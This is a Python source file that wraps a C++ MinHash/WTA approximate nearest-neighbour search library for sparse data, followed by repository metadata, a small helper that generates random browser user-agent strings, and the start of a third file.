sparse_neighbors_search/neighbors/nearestNeighborsCppInterface.py
|
joachimwolff/sparse-neighbors-search
|
0a827108f975e6dcda55bcd2d68beb3b86f23bee
|
[
"MIT"
] | 10
|
2015-07-28T07:17:02.000Z
|
2020-05-11T08:14:44.000Z
|
sparse_neighbors_search/neighbors/nearestNeighborsCppInterface.py
|
joachimwolff/minHashNearestNeighbors
|
0a827108f975e6dcda55bcd2d68beb3b86f23bee
|
[
"MIT"
] | null | null | null |
sparse_neighbors_search/neighbors/nearestNeighborsCppInterface.py
|
joachimwolff/minHashNearestNeighbors
|
0a827108f975e6dcda55bcd2d68beb3b86f23bee
|
[
"MIT"
] | 2
|
2016-08-11T14:00:05.000Z
|
2017-03-23T19:06:29.000Z
|
# Copyright 2016, 2017, 2018, 2019, 2020 Joachim Wolff
# PhD Thesis
#
# Copyright 2015, 2016 Joachim Wolff
# Master Thesis
# Tutor: Fabrizio Costa
# Winter semester 2015/2016
#
# Chair of Bioinformatics
# Department of Computer Science
# Faculty of Engineering
# Albert-Ludwigs-University Freiburg im Breisgau
__author__ = 'joachimwolff'
import multiprocessing as mp
from scipy.sparse import csr_matrix
from sklearn.random_projection import SparseRandomProjection
from sklearn import random_projection
from sklearn.utils import check_X_y
from numpy import asarray
import numpy as np
import math
import _nearestNeighbors
class _NearestNeighborsCppInterface():
"""Approximate unsupervised learner for implementing neighbor searches on sparse data sets. Based on a
dimension reduction with minimum hash functions or winner takes it all hashing.
Parameters
----------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for :meth:`k_neighbors` queries.
radius : float, optional (default = 1.0)
Range of parameter space to use by default for :meth`radius_neighbors`
queries.
fast : {True, False}, optional (default = False)
- True: will only use an inverse index to compute a k_neighbor query.
- False: an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
number_of_hash_functions : int, optional (default = '400')
Number of hash functions to use for computing the inverse index.
max_bin_size : int, optional (default = 50)
The number of maximal collisions for one hash value of one hash function. If one value of a hash function
has more collisions, this value will be ignored.
minimal_blocks_in_common : int, optional (default = 1)
The minimal number of hash collisions two instances have to be in common to be recognised. Everything less
will be ignored.
shingle_size : int, optional (default = 4)
Reduction factor for the signature size.
E.g. number_of_hash_functions=400 and shingle_size=4 --> Size of the signature will be 100
excess_factor : int, optional (default = 5)
Factor to return more neighbors internally as defined with n_neighbors. Factor is useful to increase the
precision of the :meth:`algorithm=exact` version of the implementation.
E.g.: n_neighbors = 5, excess_factor = 5. Internally n_neighbors*excess_factor = 25 neighbors will be returned.
Now the reduced data set for sklearn.NearestNeighbors is of size 25 and not 5.
similarity : {True, False}, optional (default = False)
If true: cosine similarity is used
If false: Euclidean distance is used
number_of_cores : int, optional (default = None)
Number of cores that should be used for openmp. If your system doesn't support openmp, this value
will have no effect. If it supports openmp and it is not defined, the maximum number of cores is used.
chunk_size : int, optional (default = None)
Number of elements one cpu core should work on. If it is set to "0" the default behaviour of openmp is used;
all cores are getting the same amount of data at once; e.g. 8-core cpu and 128 elements to process, every core will
get 16 elements at once.
prune_inverse_index : int, optional (default = -1)
Remove every hash value with less occurence than n. If -1 it is deactivated.
prune_inverse_index_after_instance: float, optional (default = -1.0)
Start all the pruning routines after x% of the data during the fitting process.
hash_algorithm: int, optional (default = 0)
Which hash function should be used. 0 for MinHash and 1 for WTA-Hash.
remove_hash_function_with_less_entries_as: int, optional (default =-1)
Remove every hash function with less hash values as n.
block_size : int, optional (default = 5)
How much more hash functions should be computed. Number is relevant for the shingels.
shingle : int, optional (default = 0)
store_value_with_least_sigificant_bit : int, optional (default = 0)
cpu_gpu_load_balancing : int, optional (default = 1)
0 if 100% cpu, 1 if 100% gpu.
gpu_hashing : int, optional (default = 1)
If the hashing of MinHash should be computed on the GPU (1) but the prediction is computed on the CPU.
If 0 it is deactivated.
speed_optimized : {True, False}, optional (default = None)
A parameter setting that is optimized for the best speed. Can not be used together with the parameter 'accuracy_optimized'.
If bad results are computed, try 'accuracy_optimized' or optimize the parameters with a hyperparameter optimization.
accuracy_optimized : {True, False}, optional (default = None)
A parameter setting that is optimized for the best accuracy. Can not be used together with the parameter 'speed_optimized'.
If results are computed to slow, try 'speed_optimized' or optimize the parameters with a hyperparameter optimization.
Notes
-----
The documentation is copied from scikit-learn and was only extend for a few cases. All examples are available there.
http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.NearestNeighbors.html#sklearn.neighbors.NearestNeighbors
"""
def __init__(self, n_neighbors=5, radius=1.0, fast=False, number_of_hash_functions=400,
max_bin_size=50, minimal_blocks_in_common=1, shingle_size=4, excess_factor=5,
similarity=False, number_of_cores=None, chunk_size=None, prune_inverse_index=-1,
prune_inverse_index_after_instance=-1.0, remove_hash_function_with_less_entries_as=-1,
hash_algorithm=0, block_size=5, shingle=0, store_value_with_least_sigificant_bit=0,
cpu_gpu_load_balancing=0, gpu_hashing=0, rangeK_wta=10, maxFeatures=None, absolute_numbers=False):
# self._X
# self._y = None
self._maxFeatures = maxFeatures
self.absoluteNumbers = absolute_numbers
self.n_neighbors = n_neighbors
# print('self.absoluteNumbers init nncpi {}'.format(self.absoluteNumbers))
if number_of_cores is None:
number_of_cores = mp.cpu_count()
if chunk_size is None:
chunk_size = 0
# maximal_number_of_hash_collisions = int(math.ceil(number_of_hash_functions))# / float(shingle_size)))
maximal_number_of_hash_collisions = int(number_of_hash_functions)
self._index_elements_count = 0
self._pointer_address_of_nearestNeighbors_object = _nearestNeighbors.create_object(number_of_hash_functions,
shingle_size, number_of_cores, chunk_size, n_neighbors,
minimal_blocks_in_common, max_bin_size,
maximal_number_of_hash_collisions, excess_factor,
1 if fast else 0, 1 if similarity else 0,
prune_inverse_index,
prune_inverse_index_after_instance, remove_hash_function_with_less_entries_as,
hash_algorithm,
block_size,
shingle, store_value_with_least_sigificant_bit, cpu_gpu_load_balancing, gpu_hashing, rangeK_wta)
def __del__(self):
_nearestNeighbors.delete_object(self._pointer_address_of_nearestNeighbors_object)
def fit(self, X, y=None):
"""Fit the model using X as training data.
Parameters
----------
X : {array-like, sparse matrix}, optional
Training data. If array or matrix, shape = [n_samples, n_features]
If X is None, a "lazy fitting" is performed. If kneighbors is called, the fitting
with with the data there is done. Also the caching of computed hash values is deactivated in
this case.
y : list, optional (default = None)
List of classes for the given input of X. Size have to be n_samples."""
if y is not None:
self._y_is_csr = True
_, self._y = check_X_y(X, y, "csr", multi_output=True)
if self._y.ndim == 1 or self._y.shape[1] == 1:
self._y_is_csr = False
else:
self._y_is_csr = False
X_csr = csr_matrix(X)
self._index_elements_count = X_csr.shape[0]
# instances, features = X_csr.nonzero()
if self._maxFeatures is None:
self._maxFeatures = int(max(X_csr.getnnz(1)))
# data = X_csr.data
# returns a pointer to the inverse index stored in c++
self._pointer_address_of_nearestNeighbors_object = _nearestNeighbors.fit(X_csr.indptr.tolist(), X_csr.indices.tolist(), X_csr.data.tolist(),
X_csr.shape[0], self._maxFeatures,
self._pointer_address_of_nearestNeighbors_object)
def partial_fit(self, X, y=None):
"""Extend the model by X as additional training data.
Parameters
----------
X : {array-like, sparse matrix}
Training data. Shape = [n_samples, n_features]
y : list, optional (default = None)
List of classes for the given input of X. Size have to be n_samples."""
if y is not None:
if self._y_is_csr:
self._y = np.vstack([self._y, y])
else:
self._y = np.concatenate((self._y, y), axis=0)
X_csr = csr_matrix(X)
# instances, features = X_csr.nonzero()
# data = X_csr.data
# for i in xrange(len(instances)):
# instances[i] += self._index_elements_count
self._index_elements_count += X.shape[0]
# self._pointer_address_of_nearestNeighbors_object = _nearestNeighbors.fit(instances.tolist(), features.tolist(), data.tolist(),
# self._pointer_address_of_nearestNeighbors_object)
self._pointer_address_of_nearestNeighbors_object = _nearestNeighbors.partial_fit(X_csr.indptr.tolist(), X_csr.indices.tolist(), X_csr.data.tolist(),
X_csr.shape[0], self._maxFeatures, self._pointer_address_of_nearestNeighbors_object)
def kneighbors(self, X=None, n_neighbors=None, return_distance=True, fast=None, similarity=None, pAbsoluteNumbers=None):
"""Finds the n_neighbors of a point X or of all points of X.
Parameters
----------
X : {array-like, sparse matrix}, optional
Data point(s) to be searched for n_neighbors. Shape = [n_samples, n_features]
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
n_neighbors : int, optional
Number of neighbors to get (default is the value passed to the constructor).
return_distance : boolean, optional. Defaults to True.
If False, distances will not be returned
fast : {'True', 'False'}, optional (default = 'None')
- 'True': will only use an inverse index to compute a k_neighbor query.
- 'False': an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
If not passed, default value is what was passed to the constructor.
similarity: {True, False}, optional (default = None)
If true: cosine similarity is used
If false: Euclidean distance is used
If None: Value that was defined at the init is taken.
pAbsoluteNumbers: {True, False}, optional (default = None)
If true: The similarity measure are the absolute number of hash collisions
If false or None: The similarity measure is transformed to a distance measure and is relative to maximal allowed number of hash collisions
Returns
-------
dist : array, shape = [n_samples, distances]
Array representing the lengths to points, only present if
return_distance=True
ind : array, shape = [n_samples, neighbors]
Indices of the nearest points in the population matrix."""
max_number_of_instances = 0
if fast is None:
fast = -1
elif fast:
fast = 1
else:
fast = 0
if similarity is None:
similarity = -1
elif similarity:
similarity = 1
else:
similarity = 0
if pAbsoluteNumbers is None:
pAbsoluteNumbers = self.absoluteNumbers
elif pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
# print('self.absoluteNumbers knn call nncpi {}'.format(pAbsoluteNumbers))
if X is None:
result = _nearestNeighbors.kneighbors([], [], [],
0, 0,
n_neighbors if n_neighbors else 0,
1 if return_distance else 0,
fast, similarity, pAbsoluteNumbers, self._pointer_address_of_nearestNeighbors_object)
else:
X_csr = csr_matrix(X)
instances, features = X_csr.nonzero()
maxFeatures = int(max(X_csr.getnnz(1)))
data = X_csr.data
max_number_of_instances = X_csr.shape[0]
result = _nearestNeighbors.kneighbors(instances.tolist(), features.tolist(), data.tolist(),
max_number_of_instances, maxFeatures,
n_neighbors if n_neighbors else 0,
1 if return_distance else 0,
fast, similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
# print result[0]
# print result[1]
if return_distance:
return asarray(result[0]), asarray(result[1])
else:
return asarray(result[0])
def kneighbors_graph(self, X=None, n_neighbors=None, mode='connectivity', fast=None, symmetric=True, similarity=None, pAbsoluteNumbers=None):
"""Computes the (weighted) graph of k-Neighbors for points in X
Parameters
----------
X : array-like, last dimension same as that of fit data, optional
The query point or points.
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
n_neighbors : int
Number of neighbors for each sample.
(default is value passed to the constructor).
mode : {'connectivity', 'distance'}, optional
Type of returned matrix: 'connectivity' will return the
connectivity matrix with ones and zeros, in 'distance' the
edges are Euclidean distance between points.
fast : {'True', 'False'}, optional (default = 'None')
- 'True': will only use an inverse index to compute a k_neighbor query.
- 'False': an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
If not passed, default value is what was passed to the constructor.
similarity: {True, False}, optional (default = None)
If true: cosine similarity is used
If false: Euclidean distance is used
If None: Value that was defined at the init is taken.
symmetric: {True, False} (default = True)
If true the returned graph is symmetric, otherwise not.
pAbsoluteNumbers: {True, False}, optional (default = None)
If true: The similarity measure are the absolute number of hash collisions
If false or None: The similarity measure is transformed to a distance measure and is relative to maximal allowed number of hash collisions
Returns
-------
A : sparse matrix in CSR format, shape = [n_samples, n_samples_fit]
n_samples_fit is the number of samples in the fitted data
A[i, j] is assigned the weight of edge that connects i to j.
"""
if fast is None:
fast = -1
elif fast:
fast = 1
else:
fast = 0
if similarity is None:
similarity = -1
elif similarity:
similarity = 1
else:
similarity = 0
if pAbsoluteNumbers is None:
pAbsoluteNumbers = self.absoluteNumbers
elif pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
if mode == "connectivity":
return_distance = False
elif mode == "distance":
return_distance = True
else:
return
max_number_of_instances = 0
if X is None:
row, column, data = _nearestNeighbors.kneighbors_graph([], [], [],
0, 0,
n_neighbors if n_neighbors else 0,
1 if return_distance else 0,
fast, 1 if symmetric else 0,
similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
else:
X_csr = csr_matrix(X)
instances, features = X_csr.nonzero()
data = X_csr.data
max_number_of_instances = X_csr.shape[0]
maxFeatures = int(max(X_csr.getnnz(1)))
row, column, data = _nearestNeighbors.kneighbors_graph(instances.tolist(), features.tolist(), data.tolist(),
max_number_of_instances, maxFeatures,
n_neighbors if n_neighbors else 0,
1 if return_distance else 0,
fast, 1 if symmetric else 0,
similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
return csr_matrix((data, (row, column)))
def radius_neighbors(self, X=None, radius=None, return_distance=None, fast=None, similarity=None, pAbsoluteNumbers=None):
"""Finds the neighbors within a given radius of a point or points.
Return the indices and distances of each point from the dataset
lying in a ball with size ``radius`` around the points of the query
array. Points lying on the boundary are included in the results.
The result points are *not* necessarily sorted by distance to their
query point.
Parameters
----------
X : array-like, (n_samples, n_features), optional
The query point or points.
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
radius : float
Limiting distance of neighbors to return.
(default is the value passed to the constructor).
return_distance : boolean, optional. Defaults to True.
If False, distances will not be returned
fast : bool, optional (default = 'False')
- 'True': will only use an inverse index to compute a k_neighbor query.
- 'False': an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
If not passed, default value is what was passed to the constructor.
similarity: {True, False}, optional (default = None)
If true: cosine similarity is used
If false: Euclidean distance is used
If None: Value that was defined at the init is taken.
pAbsoluteNumbers: {True, False}, optional (default = None)
If true: The similarity measure are the absolute number of hash collisions
If false or None: The similarity measure is transformed to a distance measure and is relative to maximal allowed number of hash collisions
Returns
-------
dist : array, shape (n_samples,) of arrays
Array representing the distances to each point, only present if
return_distance=True. The distance values are computed according
to the ``metric`` constructor parameter.
ind : array, shape (n_samples,) of arrays
An array of arrays of indices of the approximate nearest points
from the population matrix that lie within a ball of size
``radius`` around the query points."""
if fast is None:
fast = -1
elif fast:
fast = 1
else:
fast = 0
if pAbsoluteNumbers is None:
pAbsoluteNumbers = self.absoluteNumbers
elif pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
if pAbsoluteNumbers is None or pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
if radius is None:
radius = 0
max_number_of_instances = 0
if X is None:
result = _nearestNeighbors.radius_neighbors([], [], [],
0, 0,
radius if radius else 0,
1 if return_distance else 0,
fast, similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
else:
X_csr = csr_matrix(X)
instances, features = X_csr.nonzero()
data = X_csr.data
max_number_of_instances = X.shape[0]
maxFeatures = int(max(X_csr.getnnz(1)))
result = _nearestNeighbors.radius_neighbors(instances.tolist(), features.tolist(), data.tolist(),
max_number_of_instances, maxFeatures,
radius if radius else 0,
1 if return_distance else 0,
fast, similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
if return_distance:
return asarray(result[0]), asarray(result[1])
else:
return asarray(result[0])
def radius_neighbors_graph(self, X=None, radius=None, mode='connectivity', fast=None, symmetric=True, similarity=None, pAbsoluteNumbers=None):
"""Computes the (weighted) graph of Neighbors for points in X
Neighborhoods are restricted the points at a distance lower than
radius.
Parameters
----------
X : array-like, shape = [n_samples, n_features], optional
The query point or points.
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
radius : float
Radius of neighborhoods.
(default is the value passed to the constructor).
mode : {'connectivity', 'distance'}, optional
Type of returned matrix: 'connectivity' will return the
connectivity matrix with ones and zeros, in 'distance' the
edges are Euclidean distance between points.
fast : bool, optional (default = 'False')
- 'True': will only use an inverse index to compute a k_neighbor query.
- 'False': an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
If not passed, default value is what was passed to the constructor.
similarity: {True, False}, optional (default = None)
If true: cosine similarity is used
If false: Euclidean distance is used
If None: Value that was defined at the init is taken.
pAbsoluteNumbers: {True, False}, optional (default = None)
If true: The similarity measure are the absolute number of hash collisions
If false or None: The similarity measure is transformed to a distance measure and is relative to maximal allowed number of hash collisions
symmetric: {True, False} (default = True)
If true the returned graph is symmetric, otherwise not.
Returns
-------
A : sparse matrix in CSR format, shape = [n_samples, n_samples]
A[i, j] is assigned the weight of edge that connects i to j."""
if fast is None:
fast = -1
elif fast:
fast = 1
else:
fast = 0
if similarity is None:
similarity = -1
elif similarity:
similarity = 1
else:
similarity = 0
if pAbsoluteNumbers is None:
pAbsoluteNumbers = self.absoluteNumbers
elif pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
if mode == "connectivity":
return_distance = False
elif mode == "distance":
return_distance = True
else:
return
max_number_of_instances = 0
if X is None:
row, column, data = _nearestNeighbors.radius_neighbors_graph([], [], [],
0, 0,
radius if radius else 0,
1 if return_distance else 0,
fast, 1 if symmetric else 0,
similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
else:
X_csr = csr_matrix(X)
instances, features = X_csr.nonzero()
data = X_csr.data
max_number_of_instances = X_csr.shape[0]
maxFeatures = int(max(X_csr.getnnz(1)))
row, column, data = _nearestNeighbors.radius_neighbors_graph(instances.tolist(), features.tolist(), data.tolist(),
max_number_of_instances, maxFeatures,
radius if radius else 0,
1 if return_distance else 0,
fast, 1 if symmetric else 0,
similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
return csr_matrix((data, (row, column)))
def fit_kneighbors(self, X, n_neighbors=None, return_distance=True, fast=None, similarity=None, pAbsoluteNumbers=None):
""""Fits and returns the n_neighbors of X.
Parameters
----------
X : {array-like, sparse matrix}, optional
Data point(s) to be searched for n_neighbors. Shape = [n_samples, n_features]
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
n_neighbors : int, optional
Number of neighbors to get (default is the value passed to the constructor).
return_distance : boolean, optional. Defaults to True.
If False, distances will not be returned
fast : {'True', 'False'}, optional (default = 'None')
- 'True': will only use an inverse index to compute a k_neighbor query.
- 'False': an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
If not passed, default value is what was passed to the constructor.
similarity: {True, False}, optional (default = None)
If true: cosine similarity is used
If false: Euclidean distance is used
If None: Value that was defined at the init is taken.
pAbsoluteNumbers: {True, False}, optional (default = None)
If true: The similarity measure are the absolute number of hash collisions
If false or None: The similarity measure is transformed to a distance measure and is relative to maximal allowed number of hash collisions
Returns
-------
dist : array, shape = [n_samples, distances]
Array representing the lengths to points, only present if
return_distance=True
ind : array, shape = [n_samples, neighbors]
Indices of the nearest points in the population matrix."""
if fast is None:
fast = -1
elif fast:
fast = 1
else:
fast = 0
if similarity is None:
similarity = -1
elif similarity:
similarity = 1
else:
similarity = 0
if pAbsoluteNumbers is None:
pAbsoluteNumbers = self.absoluteNumbers
elif pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
X_csr = csr_matrix(X)
self._index_elements_count = X_csr.shape[0]
instances, features = X_csr.nonzero()
data = X_csr.data
maxFeatures = int(max(X_csr.getnnz(1)))
# returns a pointer to the inverse index stored in c++
result = _nearestNeighbors.fit_kneighbors(instances.tolist(), features.tolist(), data.tolist(),
X_csr.shape[0], maxFeatures,
n_neighbors if n_neighbors else 0,
1 if return_distance else 0,
fast, similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
if return_distance:
return asarray(result[0]), asarray(result[1])
else:
return asarray(result[0])
def fit_kneighbor_graph(self, X, n_neighbors=None, mode='connectivity', fast=None, symmetric=True, similarity=None, pAbsoluteNumbers=None):
"""Fits and computes the (weighted) graph of k-Neighbors for points in X
Parameters
----------
X : array-like, last dimension same as that of fit data, optional
The query point or points.
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
n_neighbors : int
Number of neighbors for each sample.
(default is value passed to the constructor).
mode : {'connectivity', 'distance'}, optional
Type of returned matrix: 'connectivity' will return the
connectivity matrix with ones and zeros, in 'distance' the
edges are Euclidean distance between points.
fast : {'True', 'False'}, optional (default = 'None')
- 'True': will only use an inverse index to compute a k_neighbor query.
- 'False': an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
If not passed, default value is what was passed to the constructor.
similarity: {True, False}, optional (default = None)
If true: cosine similarity is used
If false: Euclidean distance is used
If None: Value that was defined at the init is taken.
pAbsoluteNumbers: {True, False}, optional (default = None)
If true: The similarity measure are the absolute number of hash collisions
If false or None: The similarity measure is transformed to a distance measure and is relative to maximal allowed number of hash collisions
symmetric: {True, False} (default = True)
If true the returned graph is symmetric, otherwise not.
Returns
-------
A : sparse matrix in CSR format, shape = [n_samples, n_samples_fit]
n_samples_fit is the number of samples in the fitted data
A[i, j] is assigned the weight of edge that connects i to j.
"""
if fast is None:
fast = -1
elif fast:
fast = 1
else:
fast = 0
if similarity is None:
similarity = -1
elif similarity:
similarity = 1
else:
similarity = 0
if pAbsoluteNumbers is None:
pAbsoluteNumbers = self.absoluteNumbers
elif pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
if mode == "connectivity":
return_distance = False
elif mode == "distance":
return_distance = True
else:
return
X_csr = csr_matrix(X)
self._index_elements_count = X_csr.shape[0]
instances, features = X_csr.nonzero()
maxFeatures = int(max(X_csr.getnnz(1)))
data = X_csr.data
# returns a pointer to the inverse index stored in c++
row, column, data = _nearestNeighbors.fit_kneighbor_graph(instances.tolist(), features.tolist(), data.tolist(),
X_csr.shape[0], maxFeatures,
n_neighbors if n_neighbors else 0,
1 if return_distance else 0,
fast, 1 if symmetric else 0,
similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
return csr_matrix((data, (row, column)))
def fit_radius_neighbors(self, X, radius=None, return_distance=None, fast=None, similarity=None, pAbsoluteNumbers=None):
"""Fits the data and finds the neighbors within a given radius of a point or points.
Return the indices and distances of each point from the dataset
lying in a ball with size ``radius`` around the points of the query
array. Points lying on the boundary are included in the results.
The result points are *not* necessarily sorted by distance to their
query point.
Parameters
----------
X : array-like, (n_samples, n_features), optional
The query point or points.
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
radius : float
Limiting distance of neighbors to return.
(default is the value passed to the constructor).
return_distance : boolean, optional. Defaults to True.
If False, distances will not be returned
fast : bool, optional (default = 'False')
- 'True': will only use an inverse index to compute a k_neighbor query.
- 'False': an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
If not passed, default value is what was passed to the constructor.
similarity: {True, False}, optional (default = None)
If true: cosine similarity is used
If false: Euclidean distance is used
If None: Value that was defined at the init is taken.
pAbsoluteNumbers: {True, False}, optional (default = None)
If true: The similarity measure are the absolute number of hash collisions
If false or None: The similarity measure is transformed to a distance measure and is relative to maximal allowed number of hash collisions
Returns
-------
dist : array, shape (n_samples,) of arrays
Array representing the distances to each point, only present if
return_distance=True. The distance values are computed according
to the ``metric`` constructor parameter.
ind : array, shape (n_samples,) of arrays
An array of arrays of indices of the approximate nearest points
from the population matrix that lie within a ball of size
``radius`` around the query points."""
if fast is None:
fast = -1
elif fast:
fast = 1
else:
fast = 0
if pAbsoluteNumbers is None:
pAbsoluteNumbers = self.absoluteNumbers
elif pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
if similarity is None:
similarity = -1
elif similarity:
similarity = 1
else:
similarity = 0
X_csr = csr_matrix(X)
self._index_elements_count = X_csr.shape[0]
instances, features = X_csr.nonzero()
data = X_csr.data
maxFeatures = int(max(X_csr.getnnz(1)))
# returns a pointer to the inverse index stored in c++
result = _nearestNeighbors.fit_radius_neighbors(instances.tolist(), features.tolist(), data.tolist(),
X_csr.shape[0], maxFeatures,
radius if radius else 0,
1 if return_distance else 0,
fast, similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
if return_distance:
return asarray(result[0]), asarray(result[1])
else:
return asarray(result[0])
def fit_radius_neighbors_graph(self, X, radius=None, mode='connectivity', fast=None, symmetric=True, similarity=None, pAbsoluteNumbers=None):
"""Fits and computes the (weighted) graph of Neighbors for points in X
Neighborhoods are restricted the points at a distance lower than
radius.
Parameters
----------
X : array-like, shape = [n_samples, n_features], optional
The query point or points.
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
radius : float
Radius of neighborhoods.
(default is the value passed to the constructor).
mode : {'connectivity', 'distance'}, optional
Type of returned matrix: 'connectivity' will return the
connectivity matrix with ones and zeros, in 'distance' the
edges are Euclidean distance between points.
fast : bool, optional (default = 'False')
- 'True': will only use an inverse index to compute a k_neighbor query.
- 'False': an inverse index is used to preselect instances, and these are used to get
the original data from the data set to answer a k_neighbor query. The
original data is stored in the memory.
If not passed, default value is what was passed to the constructor.
similarity: {True, False}, optional (default = None)
If true: cosine similarity is used
If false: Euclidean distance is used
If None: Value that was defined at the init is taken.
symmetric: {True, False} (default = True)
If true the returned graph is symmetric, otherwise not.
pAbsoluteNumbers: {True, False}, optional (default = None)
If true: The similarity measure are the absolute number of hash collisions
If false or None: The similarity measure is transformed to a distance measure and is relative to maximal allowed number of hash collisions
Returns
-------
A : sparse matrix in CSR format, shape = [n_samples, n_samples]
A[i, j] is assigned the weight of edge that connects i to j."""
if fast is None:
fast = -1
elif fast:
fast = 1
else:
fast = 0
if pAbsoluteNumbers is None:
pAbsoluteNumbers = self.absoluteNumbers
elif pAbsoluteNumbers == False:
pAbsoluteNumbers = 0
else:
pAbsoluteNumbers = 1
if similarity is None:
similarity = -1
elif similarity:
similarity = 1
else:
similarity = 0
if mode == "connectivity":
return_distance = False
elif mode == "distance":
return_distance = True
else:
return
X_csr = csr_matrix(X)
self._index_elements_count = X_csr.shape[0]
instances, features = X_csr.nonzero()
data = X_csr.data
maxFeatures = int(max(X_csr.getnnz(1)))
# returns a pointer to the inverse index stored in c++
row, column, data = _nearestNeighbors.fit_radius_neighbors_graph(instances.tolist(), features.tolist(), data.tolist(),
X_csr.shape[0], maxFeatures,
radius if radius else 0,
1 if return_distance else 0,
fast, 1 if symmetric else 0,
similarity, pAbsoluteNumbers,
self._pointer_address_of_nearestNeighbors_object)
return csr_matrix((data, (row, column)))
def get_distribution_of_inverse_index(self):
"""Returns the number of created hash values per hash function,
the average size of elements per hash value per hash function,
the mean and the standard deviation."""
return _nearestNeighbors.get_distribution_of_inverse_index(self._pointer_address_of_nearestNeighbors_object)
def _getY(self):
return self._y
def _getY_is_csr(self):
return self._y_is_csr
| 51.928651
| 187
| 0.556441
| 5,156
| 46,580
| 4.904577
| 0.081071
| 0.009332
| 0.012812
| 0.022778
| 0.813785
| 0.796069
| 0.775625
| 0.757632
| 0.740312
| 0.731612
| 0
| 0.01003
| 0.385681
| 46,580
| 896
| 188
| 51.986607
| 0.873703
| 0.480313
| 0
| 0.786802
| 0
| 0
| 0.00688
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038071
| false
| 0
| 0.022843
| 0.005076
| 0.111675
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ee43b26ecdd9e791573d84bf7582a58ff9a3caf1
| 194
|
py
|
Python
|
imagedl/modules/utils/ua.py
|
CharlesPikachu/imagedl
|
86114e84d45462dbf1ad8f96be5705bbd892b59e
|
[
"Apache-2.0"
] | 6
|
2022-03-21T16:32:35.000Z
|
2022-03-27T04:51:30.000Z
|
imagedl/modules/utils/ua.py
|
CharlesPikachu/imagedl
|
86114e84d45462dbf1ad8f96be5705bbd892b59e
|
[
"Apache-2.0"
] | null | null | null |
imagedl/modules/utils/ua.py
|
CharlesPikachu/imagedl
|
86114e84d45462dbf1ad8f96be5705bbd892b59e
|
[
"Apache-2.0"
] | null | null | null |
'''
Function:
随机生成user-agent
Author:
Charles
微信公众号:
Charles的皮卡丘
'''
from user_agent import generate_user_agent
'''随机生成user-agent'''
def randomua():
return generate_user_agent()
| 13.857143
| 42
| 0.71134
| 22
| 194
| 6.045455
| 0.636364
| 0.203008
| 0.255639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175258
| 194
| 14
| 43
| 13.857143
| 0.83125
| 0.365979
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
ee6ff2d83b2f3ea1ce012ebfc436dd71eb81cb29
| 117
|
py
|
Python
|
kwat/internet/__init__.py
|
KwatME/ccal
|
d96dfa811482eee067f346386a2181ec514625f4
|
[
"MIT"
] | 5
|
2017-05-05T17:50:28.000Z
|
2019-01-30T19:23:02.000Z
|
kwat/internet/__init__.py
|
KwatME/ccal
|
